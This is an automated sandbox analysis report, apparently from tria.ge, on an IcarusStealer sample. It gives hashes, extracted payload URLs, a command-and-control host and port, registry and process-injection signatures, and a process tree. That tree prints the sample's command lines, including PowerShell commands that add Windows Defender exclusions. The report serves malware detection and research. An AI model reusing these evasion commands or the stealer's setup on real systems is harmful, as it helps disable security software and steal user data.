Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10/03/2024, 02:56
Static task
static1
Behavioral task
behavioral1
Sample
c0e9809fcc4b0347e9257a16d71eeecb.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c0e9809fcc4b0347e9257a16d71eeecb.exe
Resource
win10v2004-20240226-en
General
-
Target
c0e9809fcc4b0347e9257a16d71eeecb.exe
-
Size
494KB
-
MD5
c0e9809fcc4b0347e9257a16d71eeecb
-
SHA1
45dd5e7f29e2939de5fb6bd7efe1cf59b6170dd7
-
SHA256
723eff54d04dabd806c06190b582ccaba96836d923ce2d49fef537ba3568669a
-
SHA512
a24ee93e7978f5075fed12c04e1100e94123df5f11c7e4e81821ac929a411e0a39b86248d1fb6bd89e09cb8835351cd2e06911041aea1c8ba34c75d274a21ba6
-
SSDEEP
12288:uX4axuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+Qq:uX5/6N6LqQzJqkd
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Executes dropped EXE 1 IoCs
pid Process 2300 cvtresa.exe -
Loads dropped DLL 1 IoCs
pid Process 2608 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 raw.githubusercontent.com 4 raw.githubusercontent.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2792 set thread context of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 c0e9809fcc4b0347e9257a16d71eeecb.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde c0e9809fcc4b0347e9257a16d71eeecb.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 2300 cvtresa.exe 2896 powershell.exe 2120 powershell.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe 2300 cvtresa.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeDebugPrivilege 2556 cvtres.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeDebugPrivilege 2300 cvtresa.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 2120 powershell.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeShutdownPrivilege 3036 explorer.exe Token: SeShutdownPrivilege 3036 explorer.exe -
Suspicious use of FindShellTrayWindow 29 IoCs
pid Process 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe 3036 explorer.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2792 wrote to memory of 2796 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 29 PID 2792 wrote to memory of 2796 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 29 PID 2792 wrote to memory of 2796 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 29 PID 2792 wrote to memory of 2796 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 29 PID 2796 wrote to memory of 2628 2796 csc.exe 30 PID 2796 wrote to memory of 2628 2796 csc.exe 30 PID 2796 wrote to memory of 2628 2796 csc.exe 30 PID 2796 wrote to memory of 2628 2796 csc.exe 30 PID 2792 wrote to memory of 3036 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 31 PID 2792 wrote to memory of 3036 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 31 PID 2792 wrote to memory of 3036 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 31 PID 2792 wrote to memory of 3036 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 31 PID 2792 wrote to memory of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 PID 2792 wrote to memory of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 PID 2792 wrote to memory of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 PID 2792 wrote to memory of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 PID 2792 wrote to memory of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 PID 2792 wrote to memory of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 PID 2792 wrote to memory of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 PID 2792 wrote to memory of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 PID 2792 wrote to memory of 2556 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 32 PID 2792 wrote to memory of 2608 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 33 PID 2792 wrote to memory of 2608 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 33 PID 2792 wrote to memory of 2608 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 33 PID 2792 wrote to memory of 2608 2792 c0e9809fcc4b0347e9257a16d71eeecb.exe 33 PID 3036 wrote to memory of 2568 3036 explorer.exe 35 PID 3036 wrote to memory of 2568 3036 explorer.exe 35 PID 3036 wrote to memory of 2568 3036 explorer.exe 35 PID 2608 wrote to memory of 2300 2608 cmd.exe 36 PID 2608 wrote to memory of 2300 2608 cmd.exe 36 PID 2608 wrote to memory of 2300 2608 cmd.exe 36 PID 2608 wrote to memory of 2300 2608 cmd.exe 36 PID 2556 wrote to memory of 2736 2556 cvtres.exe 37 PID 2556 wrote to memory of 2736 2556 cvtres.exe 37 PID 2556 wrote to memory of 2736 2556 cvtres.exe 37 PID 2556 wrote to memory of 2736 2556 cvtres.exe 37 PID 2556 wrote to memory of 2440 2556 cvtres.exe 39 PID 2556 wrote to memory of 2440 2556 cvtres.exe 39 PID 2556 wrote to memory of 2440 2556 cvtres.exe 39 PID 2556 wrote to memory of 2440 2556 cvtres.exe 39 PID 2736 wrote to memory of 2120 2736 cmd.exe 41 PID 2736 wrote to memory of 2120 2736 cmd.exe 41 PID 2736 wrote to memory of 2120 2736 cmd.exe 41 PID 2736 wrote to memory of 2120 2736 cmd.exe 41 PID 2440 wrote to memory of 2896 2440 cmd.exe 42 PID 2440 wrote to memory of 2896 2440 cmd.exe 42 PID 2440 wrote to memory of 2896 2440 cmd.exe 42 PID 2440 wrote to memory of 2896 2440 cmd.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c0e9809fcc4b0347e9257a16d71eeecb.exe"C:\Users\Admin\AppData\Local\Temp\c0e9809fcc4b0347e9257a16d71eeecb.exe"1⤵
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s5hc51qx\s5hc51qx.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES122A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC79EE51B870B24A689D372EAC06B79AE.TMP"3⤵PID:2628
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2568
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client should-nutritional.gl.at.ply.gg 22817 PUGlcQLxe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\cvtresa.exeC:\Users\Admin\AppData\Local\Temp\cvtresa.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c9aa7a38880ae99367f4eb86a5039163
SHA1909cdf9f03571d275e069073f6b665c67d41f88f
SHA2560a5c5d0eb9219c745e03e1898bdb96b2d1c2bd382581b15a6cdba6f51a27a32b
SHA51288c1a6a4871c7da4376ebfd3b230625625a41557302e7d823f2add8b6d4fad05a1af00e0e0bf3541d03aeba307c80cc2a22bb9b2623609ee5cca9e7768a442e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XHWLC6968A4D7RTC3BJ3.temp
Filesize7KB
MD555b4e0c8b05b9ac967ce962a48044dea
SHA1f2c15c6a1fb95b34ebc251e9fd6b14d635b005d2
SHA256f5d331d730bd9a7d5b29851d06ea06dfc5d46f02bb22528caa351804c471abfb
SHA512df3473d41652a7c4b512f3e223847d25c4898ecee4ba11bae1d4dd4e1aa6a525bf289c143081e8a78ce41c0f4a2b556b08ff89726448706744bdec8d9a4c60fd
-
Filesize
1KB
MD56d4e315ddb659723cf270858a8023839
SHA10df893c7f7f48483e29d8db81bfabc8456ba24a9
SHA256f6528ea00f868ca00663e6aeff8def75c2db4a0b7012d9836f9267679b0e47f0
SHA51270a5bb19c9384117a21eeb1ce2e44ffc055dbf5ff958e0b912823c353a283606bafb1b7d7a5c942ffe8ecd3890c88b88597d027c19952156fe959962422339a6
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
449B
MD58e68ad8734c831b18f1668655e1368df
SHA123c634c29eecf17cadbdd04c0d5b1a2f88605239
SHA256b8764c4380584e0ac64e9c5c9ebd31d513a08bf76e38c7b9923138fc45a6b1d3
SHA512a5a379a98d2fce8da9f6bc325744727a3adcf65a5f7facfe8cb8187bdbc48f7d816b17435958a9dc55b12b2600f333e76491126aef80e6aafbbcd9f336f50f84
-
Filesize
4KB
MD55265f303d7970c7f70ee90787f45aadf
SHA15a25394bf66d4ad10610059cd7f9d075d4c10523
SHA256f0c8e6e2d3d7ef9c4f363c0c4478c72f63f7b9328032a3bf0b41e3962af62b17
SHA5123ccd39e75de389e5474153ec521c4dcb87185b90075ef984fe0d6fda8f28ad7bf6e7fc5a2bf1f6cfe9aac36c3a299ab49444885ffdd1957d63e34e33c78b07c8